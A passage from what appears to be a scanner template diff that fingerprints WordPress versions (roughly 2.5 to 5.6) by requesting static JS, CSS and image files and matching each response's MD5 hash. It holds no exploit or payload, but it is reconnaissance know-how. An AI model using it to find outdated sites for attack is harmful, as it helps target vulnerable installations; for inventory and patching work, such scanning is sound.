"(\"d3ac6be23d260f9cd35bedfe4d578536\" == md5(body))" + - type: dsl + name: 4.1 - 4.4.24 + dsl: + - "(\"659d8f1d3bfd32cf405f6591d0521e7c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a5aa5e94961a7956616cb53188a39d7e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"9f525a1f1daa87dfbc70e3799598177b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a9c4b3dcac8cb4cd962ee0e16cdf5f8c\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"839d6017ae96d4f4bfd3a8a88b5bd131\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"789f878bf9f2bbefcbbf4809400fb4c9\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"723a6f72315da6e688f995bd48d4af5e\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"02dcb077436fc774c545183ee6758e46\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6ee451c64cfaeb2ac6a52570859b7d7f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"211e6c30ed511e57b88efe2a2b97c5fd\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"640c78f58918e7b49621cf4cf9cc6752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mce-view.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"a02d8e96c2f2ca0fc149b7c4c1385c9c\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"3171547f82442fc2d55817bfa741315a\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"121281e52f8f9965f747ca5e8ab92abe\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.5 + dsl: + - "(\"e79d4033829ddc9cb1d968100df9b094\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"134875901c4aeec9dd4d791828e635a1\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"6be4f47b111998d7c3f88336950240fd\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"b3cb42fc1d614d798625962d17e8f2ac\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.9 + dsl: + - "(\"985f1702972d4eef6b3665a0cee35c5b\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.5.23 + dsl: + - "(\"9c171534b6904b542a02ba6e85646da7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"5d93951714ec40da1cd2defc66fb4ce0\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"3993177e8de05866db54370ef2cc1a16\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.15 + dsl: + - "(\"d5bad7fcb5c9c00f9fcb77bbfbf4646a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"20d3f2cf57d63060adbe47ccaae6919f\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"8621171808a24ad81795d1804c1bc43c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"09186e22f2a86dbde1dec5de41d00321\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"099b86bb322333cbe7687cf8f8fe4a09\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"60702513880e16adb71448cf115a9f6d\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"95b8b4588c3cfe067139835d87ff7c0d\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"060bb01b7454220cd57ded1ade4ae3aa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3ab7c5e518658b152c35ee8ff512fdc4\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"09f646383af1481207855a1eaf2d8f16\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"1163b4783b075a846141a411ea2d5209\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"f2e51a6cc3a8ea3f6d149602645bcb91\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"946c78e0f2ae661b7ca6acb3a80987c0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"41e4a587bb092d37b80b8f197f6842c1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"040bc7424efb883e7226c1d9449fe71e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3273b048aba1d9913b5bbfa918960973\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"5133e5b6aa9c65dc7a385dfe2e395607\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"28048bd84191c288acbb362dea9da056\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"56dcc8388a67eea5a342dc00491867e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2376bf23907c57f6e89dd987b5ed3fb7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"c44000ca530596769874bb8e725adba6\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"9c02078d0cb2936ed51d3590fbc5d4df\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"588617d976f0fb7e8d6377001ceda9b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8f3b1166439554f8821758ce3f53a45f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b08752318b9c677797dd97e3035730a7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d13a6498560ed8a0e7e637376fdb38d8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"aa169601709ec48a851e50bf7b4df792\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1de46221189dbf7578b5cfa92e722cc1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"54e466ebec259ef39e66374768426fb8\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"c2c8b0acd264abd814f40dab2563f3cf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"feeb10baeb29b091f5d9cd6beccc0c16\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"054a9a4f057e1057120fa094954e85e7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d26e12df2dd2acb67f3e768e01f5b5d8\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"19c552633033aa4eab0627ace254e478\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"35ac681c6587823563f4ecee720be77e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0c32ce84717519f1ab8d89ef8cc1c6aa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5092d40859d943f65627049abf981d69\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cb7baee9f7277ad7a550f10e038c4d35\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8f8ed98776719f11c67006155b77a503\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"96f7b64b0a293ac2e43d228f140f4568\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"12a802c8cbfa88cc665b0994bc8078be\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"6996ba94f4b34f766673ae879e4a42d5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e6e925fb28b187d58f2a354f12bdb56f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3c83b20f43ff0c65312d1f9fa2d09dbb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"3646498d3f7a1ef1d030eedfef4d8b7f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b95a1b3477b0c06cfa7f65a11d24bbe8\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"0d4f8264edecbb041953ef3c360724a8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5f12fd52fc0a85758a30b0eebd0ddc70\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"cc1d21402180701c47c1455bc5847fdb\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"35a559a8d3f4dddca3af16ae66c3cf9a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed1555ab1980b0a7980504a6acfa5f54\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"cccc0c8b5781a897c2797f83384ee717\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"92976428bea2c2f91fe83b05ca5ea792\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5eae583d4410229d647883abefc5b1b0\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0d106d6a3700a6bb7483879d5b8dfd9f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"3a59db8bd48105485439d60f7ac0724f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"efbb612a09e588d6e30d9059a37edf41\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e984b359754d68064546821a1dfa1c61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2538bba34977629156eb95be7d22407f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9c7f4adc0cd1fe1a15e89ff4082f4b7c\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d156a5d5a2d81aa45d55b389236e8ce1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9318703417f33d95bd763eedd948458c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"872f4d623649b2d92097ec890c34d3bf\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b4bbb3b27d8fa55598129646b3bf278f\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"c381190bf97c9f1ee41c777e93b12351\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c976ab722a8e8698ca56a38df290504b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"37cbd34c7179a2f7445918849718d8fb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9d746a565ddc0e7ad9f9521644289b90\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"3b55aee012fbb85df3b3fd5d0f85a60c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"97228f8038ad04b998ee386178c9172e\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"267633fa6a190b5fa93afcc31f25adac\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"0afe195a271ca7a4bf8f08000bf943a2\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"fd3b392c0f810400081121da5a126dd0\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"facd6968ed068cdedb3116f4a2622a93\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"23092c4dff038dd3816799c6316d122d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"192fcdf5a7dae10e778909851e32daa2\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"b06dabae90e1bbb1c1c936b8c6660bf9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ee85b5250e7815439f67eca0ceb59036\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f875ffad5553d662beea97e63ec24bbf\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"3ca392110eade74ac3d8c28e70482844\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2edae70311d6de48156afa8ca917f432\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"f9e65b1bb803a9710e3447d689c1d361\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ffd34afb44098936fc2be7362680e0cc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7d5a0ea95d3801084e0b9aedfb6a8c10\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2ea14e975c4bc7d5e1c28b575b1cb940\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"96caf0347b9d3d8caf8fe65fff4d7ca2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"de3577867deb3d96f8a587a17b59af5f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8c4e9e4548bc64ed268f8f439d7c7c15\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0ff078a3f7baf8d8769056da9d716780\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"5ff8af8e60911aaf02b87090d443807f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"907dd7dd486d3e6bb25b36d3b8e911d9\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f18bd5023076c4185b77065ee7f93ade\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"fb72212cb33ced43457ffc0e6b715ac8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5f27b2435a5ebbaa64894de16d3a01a3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"834b5f756a3a6d4a7b53d9e9b8eb8252\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"491203d53f7340386ac8c4cd77037620\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"12b60d94f9826d402e66c2e9194aa80b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"397074641a606a0a2d568df73d020562\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"aff61e2d6b0c8508660bf5e84c8658e3\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2d0d4dc75f8710681395c1b31c6c662f\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"b51e0884a4d3518fa2eed8a2e6248078\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a524dc26a603495c337003e58b22ed32\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"bb259343e9e768b09cfb600230ef29c1\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"b90e7baca3cbec8c1d5a11da060bcdfd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"22295bf92914ef4879b36a640326ad19\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa73ab1f23b74890805f2331ca695045\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e62ecc1c0e687cffa3c68ce2a0ec06dc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"67f85a94b1d72de7e104c58ee9bc450a\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"33c7b9426ba9f1a6a4376b3ca1f46427\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4d52e18de0b095dddb25fa4b62917529\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"0e1541a8fb8c53e12386575a492301da\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0027d5e4a0fe6b521a07f94adea4d373\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3be49c25423a3be9d7d5367c0182a5b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e5e40f16166f580e6c8289a7e219e1f4\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"58dbb81230e96444f2de93603322dbac\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"509037f00aa46fcdb410056240b0769c\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.3.6 + dsl: + - "(\"0c079b9a73b9cfc434e2188b5b9a2ce8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b96ede4ca000191624f6b1abbc8a2d02\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"54667710ec100561789a6303887e681e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.js" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"207399a4074c9ef066c5834c07e43f08\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"191408780b5578f0b022dece40792719\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"224df0174bc39fd8f3f1ce3bc0b428f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"272fac6db6ba470a966e5e363fff1335\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a475fa643ad31db4aaa72d48169ee109\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"bfdaaed26c7669aba522ef65bdcdd778\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1bd63167853ac0f0233ef6ac84cd8e66\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1b5b4e6d2012ac6cf156d2aa3384a68e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-models.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"3a799b747d1cc99f440ec4630a32e040\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.2.29 + dsl: + - "(\"d420d2bafa7a4370a74f45ad61d956ec\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"edb4c59aa080eeaa22439faba31f8558\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"28a921114915381d0837f90180e29f9c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"edc8e3858fdd8365e03b244c9d368f37\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f7e77d350b7cf67c70c6e43c0686ac12\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f42702f4ffb78b7e477e0f10f6d49e9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f6d9c5afa874858948a15bb7567ed172\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"0aa9f21b635906c5318b64c3aedbb8fe\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"82eba93b7a9b05a56acfded2d3ce65e5\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"68c83cd50c29e7924959c18b4ee5cc84\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4283cafe0808f3ffec6f73ffb06606e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"119b9a27369eaef7e59ef6424d4cdf52\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"94ba6c46025a2bf27bc2a00fcc084394\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"527d1e0957b88a45d872f4a318e8ec13\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"d5e80910e6bcb047f36fa770e5af9b7a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7f248c87891b1c02b1d2fd791e67cfb7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be7550e5b289eb30781afc91b6e2e314\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"9ddd4d762d805b2c5ea458515cc5e217\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"cf85d75e70304c42f77553ee9b9ec585\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.1.32 + dsl: + - "(\"fc6243e6ea74f2ca62bffb849de3657f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"8b7746f89178fcba2f84b7f4dd295571\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"117fe2f7bd8e78b992eb115a95107c62\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d22ba8b7c26828ae98c4f152804bde39\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"cd257239f5da18126d80cef91c920c36\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"04602e573c17983fa825c1cdcdd368cb\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"1e1ff96cf9f43d17873d7fd6eaf2adf2\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"850df1d822d0e22ef2c3ebd3cf19b99e\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"cdb50c9c1f1d6c177cc146dd1669d255\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f5f319c12c4a5494df30c1d326465a6b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"d9bf61cf4192c0a437323ef3bd70132d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a3f5caf5986947eb51f0f3770770ff63\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f2e447602026b88cfc72ada19933004\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"440c1456719a7ea03648adcfbf3b59b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"4b21921e3e0ff0e78d677fe9286923d3\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"b8300b64a85bea2d8bb7ba4c8ac810be\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"42607f91d7bb0160a1f7635b2b36c67c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3 + dsl: + - "(\"4cacc9c3fcc9b6e7a9bd5802357e3d7f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"8b85ef7b2e2dc7be48e62ef794142ffc\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"01c5d623834a0c9561e54063a8cdebb5\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"06c56794790f5de1745b1215223eaf0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.js" + matchers: + - type: dsl + name: 4.7 - 4.9.4 + dsl: + - "(\"c404d2ebab29a76e5a4eef0a23c3eb10\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"782715051d87f0cf1f869f5b2358db2b\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"4eee92d2ee86812037ed3afbcab3bf9a\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"cf231fd7fd235076995cd3ea70c31f92\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"316dc6a88af5010df7bee09c481950e8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"18554862b00befc3db669e3c4af0f568\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"0289d1c13821599764774d55516ab81a\" == md5(body))" + - type: dsl + name: 2.5 - 2.7 + dsl: + - "(\"e4e96312e1bb476fc634ae4fcebde13b\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"4134afac564acdd0f18f6cd705ee7759\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f1eb3b28419b46bc4d93f760e543167d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"30afc4c6904a1bb43ca590182fa82c99\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8cefea482bbe5aecc797bd1201182c91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/w-logo-blue.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4990a6a10bcbccdbbaa0a7103f065344\" == md5(body))" + - type: dsl + name: 5.4.1 + dsl: + - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/loading.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"2d5b92b61674c850bff00cecaf0864ec\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fb72313c9cd2f6f42123ef9213837924\" == md5(body))" + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"9a8269421303631316be4ab5e34870e1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a20488e97ed28a25eb847938a297ffb4\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"6917a796d74c08a8c0b993e2acd68985\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"876d276e7d54dd2d568de865c3e0f60a\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"4085d79caf783e639794adbab5d6c2a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/sort-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"186e51267fca5d20b230c72d9a8983ee\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3109e5b77fb7f442c17fb0a10715a657\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.8.35 + dsl: + - "(\"e07d0440c2d59e252b64f10bd293f897\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"45592749900dae6565848a310a0c0fbd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8f91b441c3ac6bec3abc62d18276466a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f59fa2d103e13985d7e18df4c9d06c85\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"00f8eb37d4873aff33559be1ab3a5da0\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b03476d23e09e01f7be81edcb0327fce\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 